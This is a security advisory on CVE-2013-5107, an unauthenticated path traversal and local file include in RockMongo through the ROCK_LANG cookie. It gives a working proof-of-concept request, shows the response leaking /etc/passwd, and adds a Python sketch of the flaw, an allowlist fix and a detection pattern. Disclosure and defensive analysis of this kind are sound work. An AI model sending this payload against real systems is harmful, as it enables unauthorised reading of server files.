Damian Profancik of Trustwave SpiderLabs reports:

RockMongo is vulnerable to a Local File Include and Path Traversal vulnerability, specifically by modifying the ROCK_LANG cookie. This vulnerability does not require an attacker to be authenticated prior to performing the exploit. This is because the ROCK_LANG cookie is processed and included prior to logging in to the application.

Below is a proof of concept for exploiting this vulnerability:

Example 1 (Tested on RockMongo v1.1.2):

#Request
GET /index.php?action=login.index&host=0 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ROCK_LANG=../../../../etc/passwd%00
Connection: keep-alive

#Response
HTTP/1.1 200 OK
Date: Mon, 10 Jun 2013 13:32:57 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.9
Set-Cookie: PHPSESSID=mla2qlmqa810h07qn6bie8qk77; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4897
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>RockMongo</title>
<script language="javascript" src="js/jquery-1.4.2.min.js"></script>
<script language="javascript" src="js/jquery.textarea.js"></script>
<link rel="stylesheet" href="themes/default/css/global.css" type="text/css" media="all"/>
<script language="javascript">
$(function () {
    $(document).click(window.parent.hideMenus);
    if ($("textarea").length > 0) {
        $("textarea").tabby();
    }
});
</script>
</head>
<body>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:105:65534::/var/lib/nfs:/bin/false
postfix:x:106:114::/var/spool/postfix:/bin/false
ntop:x:107:116::/var/lib/ntop:/bin/false
mongodb:x:108:65534::/home/mongodb:/bin/false
mysql:x:109:118:MySQL Server,,,:/nonexistent:/bin/false
ntp:x:110:119::/home/ntp:/bin/false
+::::::
<script type="text/javascript">
var showMore = 0;
...

External references:
https://www.trustwave.com/spiderlabs/advisories/TWSL2013-026.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5107
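To make the root cause and the fix concrete, the following is an added Python illustration (not RockMongo's code; the language directory, allowlist and helper names are assumed). It models the unsafe include path built from the cookie, shows where the advisory's payload resolves once the NUL byte cuts off the appended suffix, and contrasts it with an allowlist lookup plus a detection check suitable for WAF rules or log review.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Assumed for illustration; RockMongo's real language directory and list differ.
LANG_DIR = "/var/www/rockmongo/langs"
ALLOWED_LANGS = frozenset({"en_us", "zh_cn", "ja", "fr", "de"})
_LANG_TOKEN = re.compile(r"[a-z]{2}(_[a-z]{2})?")
_SUSPICIOUS = re.compile(r"\.\.|[/\\]|\x00")

def rock_lang_from_cookie_header(header: str) -> Optional[str]:
    """Pull the raw ROCK_LANG value out of a Cookie request header."""
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "ROCK_LANG":
            return value
    return None

def naive_lang_path(cookie_value: str) -> str:
    """Model the unsafe pattern: the raw cookie value becomes part of an
    include path. Returns the path the OS would see; nothing is opened."""
    raw = unquote(cookie_value)  # %00 -> NUL byte, %2e -> '.'
    path = posixpath.normpath(posixpath.join(LANG_DIR, raw + ".php"))
    # A C-level open() stops at the first NUL, so the appended ".php"
    # suffix is silently dropped, which is what the payload relies on.
    return path.split("\x00", 1)[0]

def safe_lang_path(cookie_value: str) -> Optional[str]:
    """Hardened form: the cookie only selects an allowlisted language;
    the value itself never reaches the file system."""
    lang = unquote(cookie_value).strip().lower()
    if not _LANG_TOKEN.fullmatch(lang) or lang not in ALLOWED_LANGS:
        return None  # caller falls back to the default language
    return posixpath.join(LANG_DIR, lang + ".php")

def is_traversal_attempt(cookie_value: str) -> bool:
    """Detection check for WAF rules or log review: flags traversal,
    path separators or NUL bytes in the decoded cookie value."""
    return _SUSPICIOUS.search(unquote(cookie_value)) is not None

if __name__ == "__main__":
    # Constructed Cookie header mirroring the advisory's proof of concept.
    header = "ROCK_LANG=../../../../etc/passwd%00; PHPSESSID=constructed"
    value = rock_lang_from_cookie_header(header)
    print("traversal attempt:", is_traversal_attempt(value))
    print("unsafe include resolves to:", naive_lang_path(value))
    print("hardened lookup returns:", safe_lang_path(value))
```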
This was fixed upstream: http://rockmongo.com/wiki/changeLog

v1.1.6 - 2014-06-05
Fixed cookie vulnerability as reported in CVE-2013-5107 (thanks for synthomat)
Statement:

This issue affects the versions of the mongo cartridge as shipped with Red Hat OpenShift Enterprise Linux 2. Red Hat Product Security has rated this issue as having Low security impact. A future update may address this issue. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/. Additionally, OpenShift uses a strong file permission and SELinux permission model, minimizing the amount of data that can be viewed.